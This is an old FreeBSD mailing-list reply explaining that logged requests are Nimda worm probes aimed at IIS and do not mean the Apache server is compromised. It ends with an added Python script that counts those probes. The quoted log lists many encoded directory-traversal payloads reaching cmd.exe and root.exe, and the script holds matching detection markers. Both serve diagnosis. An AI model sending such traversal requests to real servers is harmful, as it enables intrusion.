From owner-freebsd-questions Tue Nov 13 20:01:51 2001
Date: Tue, 13 Nov 2001 23:02:59 -0500
From: Louis LeBlanc
To: freebsd-questions@FreeBSD.org
Subject: Re: Do these errors mean my system is compromised?
Message-ID: <20011114040259.GC25941@keyslapper.org>
In-Reply-To: <20011114040055.GB25941@keyslapper.org>
References: <0111131938440F.60958@chip.wiegand.org> <20011114040055.GB25941@keyslapper.org>
User-Agent: Mutt/1.3.23.1i

On 11/13/01 11:00 PM, Louis LeBlanc sat at the `puter and typed:
> On 11/13/01 07:38 PM, Chip sat at the `puter and typed:
> > I found the following on my apache/freebsd/php/mysql server in my log after
> > running analog -
> > Looks like someone planted something that wants NT to work correctly -
> >
> > 111: /scripts/..%255c../winnt/system32/cmd.exe
> > 111: /scripts/..%255c../winnt/system32/cmd.exe?/c+dir
> > 106: /scripts/..%5c../winnt/system32/cmd.exe
> > 106: /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
> > 66: /scripts/root.exe
> > 66: /scripts/root.exe?/c+dir
> > 64: /MSADC/root.exe
> > 64: /MSADC/root.exe?/c+dir
> > 62: /c/winnt/system32/cmd.exe
> > 62: /c/winnt/system32/cmd.exe?/c+dir
> > 59: /d/winnt/system32/cmd.exe
> > 59: /d/winnt/system32/cmd.exe?/c+dir
> > 56: /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe
> > 56: /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> > 56: /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe
> > 56: /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
> > 56: /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe
> > 56: /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> > 55: /scripts/..%c1%1c../winnt/system32/cmd.exe
> > 55: /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
> > 54: /scripts/winnt/system32/cmd.exe
> > 54: /scripts/winnt/system32/cmd.exe?/c+dir
> > 54: /scripts/..%c1%9c../winnt/system32/cmd.exe
> > 54: /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
> > 54: /scripts/..%c0%af../winnt/system32/cmd.exe
> > 54: /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
> > 51: /scripts/..%252f../winnt/system32/cmd.exe
> > 51: /scripts/..%252f../winnt/system32/cmd.exe?/c+dir
>
>
> This is the footprint of the Nimda virus *trying* to infect your
> system. You can find links to specific info on what Nimda tries to do
> on Google, if you want to sort thru a million hits. You can also get
> info on how an Apache installation can handle these (or not handle
> them) at http://www.keyslapper.org/modules/
>
> Look for the Apache::Nimda page, even if you don't want to report it
> to abuse and SecurityFocus, there are config ideas that will help you
> reduce the impact on your log file size.
>
> Also, look for the Apache::404 module. It will handle those misses and
> notify you via email - once per period for each URL. It can help you
> keep track of Nimda's impact on your server, and keep dead links tied
> up.
>
> Enough of the shameless plug. Check it out.
>

Sorry, I forgot to answer your actual question. No, you've not been
compromised. At least this is no indication. Nimda is strictly a MS
gift to the world.

Lou
--
Louis LeBlanc leblanc@keyslapper.org
Fully Funded Hobbyist, KeySlapper Extraordinaire :)
http://www.keyslapper.org

aphorism, n.: A concise, clever statement.
afterism, n.: A concise, clever statement you don't think of until too late.
-- James Alexander Thom
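An added example, not from this thread or from the keyslapper.org modules it mentions: a small Python triage script that canonicalizes the encoded IIS paths quoted above (the double-encoded %255c and the overlong %c0/%c1 escapes all collapse to the same traversal) and totals the worm probes separately from real traffic. The analog-style sample lines are constructed; on Apache every one of these requests is a 404, which is why such counts are log noise rather than evidence of compromise.

```python
import re
from urllib.parse import unquote

# Constructed sample in analog's "hits: path" form, like the post's, plus one ordinary request.
SAMPLE_LINES = """\
111: /scripts/..%255c../winnt/system32/cmd.exe?/c+dir
106: /scripts/..%5c../winnt/system32/cmd.exe
64: /MSADC/root.exe
55: /scripts/..%c1%1c../winnt/system32/cmd.exe
51: /scripts/..%252f../winnt/system32/cmd.exe?/c+dir
9: /index.html
"""
# Overlong two-byte UTF-8 escapes (%c0xx, %c1xx) that unpatched IIS decoded to one
# ASCII byte as ((lead & 0x1f) << 6) | (trail & 0x3f); e.g. %c1%1c -> "\".
_OVERLONG_RE = re.compile(r"%c([01])%([0-9a-f]{2})")
ANALOG_RE = re.compile(r"^\s*(\d+):\s*(\S+)")
PROBE_MARKERS = ("/winnt/system32/cmd.exe", "root.exe")

def normalize_path(path: str) -> str:
    """Canonicalize like a lenient decoder: drop the query, decode overlong escapes,
    percent-decode until stable (%255c -> %5c -> \\), then fold "\\" into "/"."""
    p = path.split("?", 1)[0].lower()
    for _ in range(4):  # double encoding needs a second pass; stop once stable
        q = unquote(_OVERLONG_RE.sub(
            lambda m: chr((int(m[1]) << 6) | (int(m[2], 16) & 0x3F)), p))
        if q == p:
            break
        p = q
    return p.replace("\\", "/")

def is_iis_probe(path: str) -> bool:
    """True when the canonical path aims at cmd.exe or a root.exe backdoor copy."""
    return any(marker in normalize_path(path) for marker in PROBE_MARKERS)

def summarize(text: str) -> dict:
    """Split analog-style hit counts into worm probes vs. everything else, totalling
    probes per canonical target so the encoding variants collapse together."""
    report = {"probe_hits": 0, "other_hits": 0, "targets": {}}
    for line in text.splitlines():
        m = ANALOG_RE.match(line)
        if not m:
            continue
        hits, path = int(m[1]), m[2]
        if is_iis_probe(path):
            report["probe_hits"] += hits
            target = normalize_path(path)
            report["targets"][target] = report["targets"].get(target, 0) + hits
        else:
            report["other_hits"] += hits
    return report
```

Call `summarize(SAMPLE_LINES)` (or feed it your own analog output) to see the five encoded variants fold into two canonical targets.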